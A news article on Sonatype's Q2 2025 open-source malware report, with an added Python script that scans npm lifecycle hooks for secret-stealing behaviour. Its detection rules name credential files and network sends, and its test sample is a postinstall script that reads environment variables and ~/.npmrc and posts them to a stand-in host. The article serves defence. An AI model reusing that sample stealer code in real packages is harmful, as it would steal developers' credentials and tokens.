Open-source malware targets data exfiltration


Supply chain security company Sonatype has released the Q2 2025 edition of its Open Source Malware Index, uncovering 16,279 malicious open source packages across the major ecosystems.
This brings the total number of open-source malware packages Sonatype has discovered to 845,204. Compared with the end of the same quarter last year, the total volume of malware logged by Sonatype has surged 188 percent, underscoring the growing sophistication and scale of attacks aimed at developers, software teams, and CI/CD pipelines.
"Attackers are no longer simply experimenting with open source. The numbers are telling us that threat actors have identified data as the most profitable target, and developers as the easiest way in," says Brian Fox, CTO and co-founder of Sonatype. "Developers and security teams must be vigilant, as threats increasingly hide in plain sight within everyday tools and dependencies."
Data exfiltration remains the main motivation, accounting for 55 percent of all malicious packages discovered. In Q2 alone, more than 4,400 packages were built specifically to steal sensitive data, including secrets, personally identifiable information (PII), passwords, access tokens, and API keys. These attacks increasingly target the point where developer tooling meets production: a package that runs on a developer workstation or CI runner at install time already sits next to the credentials that reach production systems, so a single leak can compromise entire environments.
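As an added example (this is not Sonatype's tooling and is not taken from the report), the Python script below shows the kind of install-time triage a team can run on an npm package before it reaches a developer machine or CI runner. It pulls the lifecycle hooks out of package.json, follows a hook to the script it runs, and looks for the pairing that characterises a secret-stealing package: reading environment variables or credential files, then sending something off-host. The manifest and setup.js are constructed samples, and the regex rules are illustrative heuristics rather than a complete detection set.

```python
"""Heuristic triage of an npm package's install-time behaviour.

Added example, not Sonatype's code. The manifest and script below are
constructed samples; in practice they would come from the unpacked tarball.
"""
import json
import re

# Hooks that `npm install` runs automatically, without any user action.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Illustrative rules: (name, pattern, weight). Exfiltration tradecraft is
# "collect (env / credential files) -> optionally encode -> send".
RULES = [
    ("reads_env", re.compile(r"process\.env\b|os\.environ\b"), 2),
    ("reads_credential_file",
     re.compile(r"\.npmrc|\.aws/credentials|\.ssh/|\.git-credentials|\.docker/config\.json"), 3),
    ("network_send",
     re.compile(r"\bhttps?\.request\(|\bfetch\(|\bnet\.connect\(|\bdns\.(lookup|resolve)"), 3),
    ("encodes_payload", re.compile(r"base64|Buffer\.from\(|btoa\("), 1),
    ("shell_exec", re.compile(r"child_process|execSync\(|spawn\("), 2),
    ("obfuscation", re.compile(r"eval\(|new Function\(|\\x[0-9a-f]{2}\\x[0-9a-f]{2}"), 2),
]


def lifecycle_scripts(manifest: dict) -> dict:
    """Return only the lifecycle hook entries declared in package.json."""
    scripts = manifest.get("scripts", {})
    return {k: v for k, v in scripts.items() if k in LIFECYCLE_HOOKS}


def scan_source(src: str) -> dict:
    """Apply RULES to a blob of script text; return {rule_name: [matches]}."""
    hits = {}
    for name, rx, _ in RULES:
        found = [m.group(0) for m in rx.finditer(src)]
        if found:
            hits[name] = found
    return hits


def risk_score(hits: dict) -> int:
    weights = {name: w for name, _, w in RULES}
    return sum(weights[n] for n in hits)


def triage(manifest: dict, files: dict) -> dict:
    """files maps a path referenced by a hook (e.g. `node ./x.js`) to its source."""
    hooks = lifecycle_scripts(manifest)
    findings, score = {}, 0
    for hook, cmd in hooks.items():
        sources = [cmd]  # the hook command itself may inline code
        for path in re.findall(r"node\s+([\w./-]+)", cmd):
            if path in files:
                sources.append(files[path])
        hits = scan_source("\n".join(sources))
        if hits:
            findings[hook] = hits
            score += risk_score(hits)
    # The exfiltration signature is collection AND a send path in install hooks.
    collects = any(k in h for h in findings.values()
                   for k in ("reads_env", "reads_credential_file"))
    sends = any("network_send" in h for h in findings.values())
    return {"hooks": hooks, "findings": findings, "score": score,
            "exfiltration_suspect": collects and sends}


# Constructed sample: a package whose postinstall hook harvests env + ~/.npmrc.
SAMPLE_MANIFEST = json.loads("""{
  "name": "color-utils-helper",
  "version": "1.0.3",
  "scripts": { "postinstall": "node ./scripts/setup.js", "test": "echo ok" }
}""")

SAMPLE_FILES = {
    "./scripts/setup.js": """
const os = require('os'); const fs = require('fs'); const https = require('https');
const data = { env: process.env, npmrc: fs.readFileSync(os.homedir() + '/.npmrc', 'utf8') };
const body = Buffer.from(JSON.stringify(data)).toString('base64');
const req = https.request({ hostname: 'example.invalid', method: 'POST', path: '/c' });
req.end(body);
"""
}

if __name__ == "__main__":
    print(json.dumps(triage(SAMPLE_MANIFEST, SAMPLE_FILES), indent=2))
```

The point of the combined check is precision: plenty of legitimate packages read `process.env` in a postinstall script, and plenty make a network call (telemetry, binary downloads), but a hook that reads credential stores and then opens an outbound connection is rare enough to block pending review. Run this against the unpacked tarball from your registry proxy, not against the repository the package claims to come from; the published artefact is what actually executes.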
There has also been an increase in malware focused on data corruption, with these threats doubling in frequency to represent over three percent of all malicious packages -- more than 400 unique instances in Q2 2025. These packages aim to damage files, inject malicious code, or otherwise sabotage applications and infrastructure. By contrast, cryptominers have declined, making up only five percent of packages in Q2.
The report shows that sophisticated threat groups are using open source to carry out cyber espionage, financial cybercrime, and more. For example, Lazarus Group, an Advanced Persistent Threat (APT) attributed to the North Korean government, has been linked to 107 packages discovered by Sonatype in Q2 2025 that collectively have more than 30,050 known downloads.
You can find out more on the Sonatype blog.
Image credit: solarseven/depositphotos.com